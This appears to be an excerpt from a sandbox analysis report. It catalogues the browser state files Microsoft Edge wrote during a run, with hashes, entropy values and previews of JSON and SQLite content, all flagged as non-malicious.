                                                                                                                                                                                                                                                            SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):36864
                                                                                                                                                                                                                                                            Entropy (8bit):1.1152510656241366
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBnx:JkIEumQv8m1ccnvS6nG0cI9sj1a
                                                                                                                                                                                                                                                            MD5:13327A613BC0A785B9EF9AF0E3B66423
                                                                                                                                                                                                                                                            SHA1:6BBF3F6D86ABDEB8F71AE1CE43BB03D2EAB536CE
                                                                                                                                                                                                                                                            SHA-256:9164361ADE194EC7B6F657D90F031CD234BA1DC17D78DB3C6AAD9997025D4C9B
                                                                                                                                                                                                                                                            SHA-512:50517F497561CACD3563DCF5E3513454807F4152F31D41B31A381F9255ECCA16578EB1BD59402BAD71FD125CD92DBC8CED98A8DBB0DBEF4A9DF12CBF1ABF0EB0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1055
                                                                                                                                                                                                                                                            Entropy (8bit):5.312436913772633
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:YXsT9ZVMdBsT7ZFRudFGcsUZ6ma3yeeI6C1MYhbA7n7:YXsT78sT1fcdsMleeIKYhbm
                                                                                                                                                                                                                                                            MD5:6BE4CFA9FAA3F33A5870CF2CCD02F20F
                                                                                                                                                                                                                                                            SHA1:EAFCA493B844B9348D1CACC259C6CCD23B1641E6
                                                                                                                                                                                                                                                            SHA-256:375EB749E1C7D7D66F203E527B5328C55E82E2F2F38B043BD2BAEEF3240E9198
                                                                                                                                                                                                                                                            SHA-512:FC6CE26B3FE1927DFFD5E8F2B89D8F222C1132981E13BF7661DD5F16D4EA09C9853CE20DF3A989686AB28D9B7B42AA8A0F16669BD8129E6065CD8CAA3094A005
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13388445611248638","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13388445614108481","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13385947218426861","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com"},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version"
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                            Entropy (8bit):0.8307038620100359
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:TLSOUOq0afDdWec9sJlAz7Nm2z8ZI7J5fc:T+OUzDbg3eAzA2ztc
                                                                                                                                                                                                                                                            MD5:B18967139991D9CA13DF7E493540A358
                                                                                                                                                                                                                                                            SHA1:97411C14A8503C11248BE7404C9A79BA5146D40C
                                                                                                                                                                                                                                                            SHA-256:CCC36F21951B4CB357C57DA0CCA1FFF3B4C7027230C10FD8BCB72C0AFF66141F
                                                                                                                                                                                                                                                            SHA-512:473AE1B215B181785EA65F87E34155D5976C7AD1FA487B025E1C8711BFD127E99066990105CDA8D6F4804459118361217455AB1644803D22E6ECB164EEEFD630
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                                                                                            Entropy (8bit):0.7739323752783591
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:llBtlEuWk8rlnHpywFBDBjDMEF4gLuumwf7ImWP9K+A7iqx9NJO7LFsjBDvqhspj:LBtiuWkKcwF11DM/FAf4ADVO7L0rqqR
                                                                                                                                                                                                                                                            MD5:764ADFBFC4FAB05E37D429B2BF6E593D
                                                                                                                                                                                                                                                            SHA1:CD3AFD38F09BD796645AD7D50F2D85D57A60E262
                                                                                                                                                                                                                                                            SHA-256:E6CA62FA980CF79D0FD6CEF557A0DF94F77E4FE173A7ABA28CF459BD7FDF4D5D
                                                                                                                                                                                                                                                            SHA-512:DC5AEC838600F08FD6FB3A6C8109E80FD70E8127AF8E02494688A69412B095147ED8C801CBAC815ABBEF9E512E2FD8FCA595FFA8D04B19D48F06BBA6AA0F5680
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):10135
                                                                                                                                                                                                                                                            Entropy (8bit):5.093621741707747
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:st/kd9s95OaFvrE9kN3Q82bV+F7cQAsOthUD+PscGJ:st/qs95OCD4bGQQTOtiDZ
                                                                                                                                                                                                                                                            MD5:4DF12E16BA7E2A7AF85870B7E7B42B28
                                                                                                                                                                                                                                                            SHA1:7E5F125C4CEECBB4BACE56917449B6B1630ABA6D
                                                                                                                                                                                                                                                            SHA-256:8BEEE8BF6CFF64406F62828CF7A1F38036E4882B4E370101EFEB163B528D63B0
                                                                                                                                                                                                                                                            SHA-512:1176A53C86754519812AFA7F418435ADF172153F6DD629BD6762A571363DAF75D409C45BBEEC63AE0D1D3E2C93E5FD6EB6476FE7AA77BF00364C2EEFC49815BE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13385827393488894","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):10135
                                                                                                                                                                                                                                                            Entropy (8bit):5.093621741707747
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:st/kd9s95OaFvrE9kN3Q82bV+F7cQAsOthUD+PscGJ:st/qs95OCD4bGQQTOtiDZ
                                                                                                                                                                                                                                                            MD5:4DF12E16BA7E2A7AF85870B7E7B42B28
                                                                                                                                                                                                                                                            SHA1:7E5F125C4CEECBB4BACE56917449B6B1630ABA6D
                                                                                                                                                                                                                                                            SHA-256:8BEEE8BF6CFF64406F62828CF7A1F38036E4882B4E370101EFEB163B528D63B0
                                                                                                                                                                                                                                                            SHA-512:1176A53C86754519812AFA7F418435ADF172153F6DD629BD6762A571363DAF75D409C45BBEEC63AE0D1D3E2C93E5FD6EB6476FE7AA77BF00364C2EEFC49815BE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13385827393488894","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):10135
                                                                                                                                                                                                                                                            Entropy (8bit):5.093621741707747
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:st/kd9s95OaFvrE9kN3Q82bV+F7cQAsOthUD+PscGJ:st/qs95OCD4bGQQTOtiDZ
                                                                                                                                                                                                                                                            MD5:4DF12E16BA7E2A7AF85870B7E7B42B28
                                                                                                                                                                                                                                                            SHA1:7E5F125C4CEECBB4BACE56917449B6B1630ABA6D
                                                                                                                                                                                                                                                            SHA-256:8BEEE8BF6CFF64406F62828CF7A1F38036E4882B4E370101EFEB163B528D63B0
                                                                                                                                                                                                                                                            SHA-512:1176A53C86754519812AFA7F418435ADF172153F6DD629BD6762A571363DAF75D409C45BBEEC63AE0D1D3E2C93E5FD6EB6476FE7AA77BF00364C2EEFC49815BE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13385827393488894","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):10135
                                                                                                                                                                                                                                                            Entropy (8bit):5.093621741707747
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:st/kd9s95OaFvrE9kN3Q82bV+F7cQAsOthUD+PscGJ:st/qs95OCD4bGQQTOtiDZ
                                                                                                                                                                                                                                                            MD5:4DF12E16BA7E2A7AF85870B7E7B42B28
                                                                                                                                                                                                                                                            SHA1:7E5F125C4CEECBB4BACE56917449B6B1630ABA6D
                                                                                                                                                                                                                                                            SHA-256:8BEEE8BF6CFF64406F62828CF7A1F38036E4882B4E370101EFEB163B528D63B0
                                                                                                                                                                                                                                                            SHA-512:1176A53C86754519812AFA7F418435ADF172153F6DD629BD6762A571363DAF75D409C45BBEEC63AE0D1D3E2C93E5FD6EB6476FE7AA77BF00364C2EEFC49815BE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13385827393488894","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):10135
                                                                                                                                                                                                                                                            Entropy (8bit):5.093621741707747
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:st/kd9s95OaFvrE9kN3Q82bV+F7cQAsOthUD+PscGJ:st/qs95OCD4bGQQTOtiDZ
                                                                                                                                                                                                                                                            MD5:4DF12E16BA7E2A7AF85870B7E7B42B28
                                                                                                                                                                                                                                                            SHA1:7E5F125C4CEECBB4BACE56917449B6B1630ABA6D
                                                                                                                                                                                                                                                            SHA-256:8BEEE8BF6CFF64406F62828CF7A1F38036E4882B4E370101EFEB163B528D63B0
                                                                                                                                                                                                                                                            SHA-512:1176A53C86754519812AFA7F418435ADF172153F6DD629BD6762A571363DAF75D409C45BBEEC63AE0D1D3E2C93E5FD6EB6476FE7AA77BF00364C2EEFC49815BE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13385827393488894","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):25012
                                                                                                                                                                                                                                                            Entropy (8bit):5.567532216382058
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lxnnNAWCWW5wLTf4uF8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP4kIrwL5rwXGhpWjO:lFNAHWWaLTfLFu1jalZ6KWujtQ
                                                                                                                                                                                                                                                            MD5:349B1938A9CEC62B3FF16064B92C0672
                                                                                                                                                                                                                                                            SHA1:080763AB47AFE1D02AE0C8A9827D710FBCEDF422
                                                                                                                                                                                                                                                            SHA-256:08F686618929E8525C279FC9FFCBAC230841D4181846867CEF79465A52943FAB
                                                                                                                                                                                                                                                            SHA-512:BB1DD90A45312DD9294317620B29EC6C584360E3FFD3D1ACEFCC5A541A014FE9E6597CB6B1E0B1F726E47EA21BE96A3A980F2010C8ADB8B85692C9ACE1CFB9D7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13385853605926868","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13385853605926868","location":5,"ma
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):25012
                                                                                                                                                                                                                                                            Entropy (8bit):5.567532216382058
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:lxnnNAWCWW5wLTf4uF8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP4kIrwL5rwXGhpWjO:lFNAHWWaLTfLFu1jalZ6KWujtQ
                                                                                                                                                                                                                                                            MD5:349B1938A9CEC62B3FF16064B92C0672
                                                                                                                                                                                                                                                            SHA1:080763AB47AFE1D02AE0C8A9827D710FBCEDF422
                                                                                                                                                                                                                                                            SHA-256:08F686618929E8525C279FC9FFCBAC230841D4181846867CEF79465A52943FAB
                                                                                                                                                                                                                                                            SHA-512:BB1DD90A45312DD9294317620B29EC6C584360E3FFD3D1ACEFCC5A541A014FE9E6597CB6B1E0B1F726E47EA21BE96A3A980F2010C8ADB8B85692C9ACE1CFB9D7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13385853605926868","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13385853605926868","location":5,"ma
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):320
                                                                                                                                                                                                                                                            Entropy (8bit):4.133998546632106
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:S85aEFljljljljlwMGlarlU3TIMersA5EEE:S+a8ljljljljlFGCU3TIM4l
                                                                                                                                                                                                                                                            MD5:C4A9E84DB5864B37567A8F3292A4BDC9
                                                                                                                                                                                                                                                            SHA1:75A17DAAD5030169301CD2C1574D87400BED2594
                                                                                                                                                                                                                                                            SHA-256:78F9E67F15273038669B80CEC9F557A257775CAFDE9C4A960E6BAF354ECB0DF2
                                                                                                                                                                                                                                                            SHA-512:DF962ADEEBF5864C6A55579588AF8C0790A4BFF7BE3DAC9FDC4084F6463F3ABA0BA37EB49B27FA55FDB36D677CD89C4A79CFE75DBDDB3C3DE4A8668838AC8585
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f..................yd................next-map-id.1.Enamespace-ca6d5df6_c002_4972_94da_b8c6a085a3a0-https://s28.q4cdn.com/.0V.e................V.e................V.e................V.e................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                            Entropy (8bit):5.102554794982302
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypXduIQ+q2PN723oH+TcwtrQMxIFUt8pXbbpdWZmwOpXXuIQVkwON723oH+TcM:7ypXw+vVaYebCFUt8pXbbm/OpXXeV5OI
                                                                                                                                                                                                                                                            MD5:30CCDD86E1380B297551B4D402275C8D
                                                                                                                                                                                                                                                            SHA1:82DC12A422BE514B38B5FDB654D80C02164F56CF
                                                                                                                                                                                                                                                            SHA-256:9F46E387ABAAE0831275121DACE181E2241865A407C0929648F21E7F8C3B3CBD
                                                                                                                                                                                                                                                            SHA-512:26591211CF781C033A607884D39DDC7E8ECA23B544698D3C9C6453365083A1ACE8C6B2B536483A895F737D80263141CD55614A84E1FEF47D6CDB74A59B46D776
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:07.563 1c0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/03/07-15:40:07.565 1c0c Recovering log #3.2025/03/07-15:40:07.569 1c0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                            Entropy (8bit):5.102554794982302
                                                                                                                                                                                                                                                            Encrypted:false
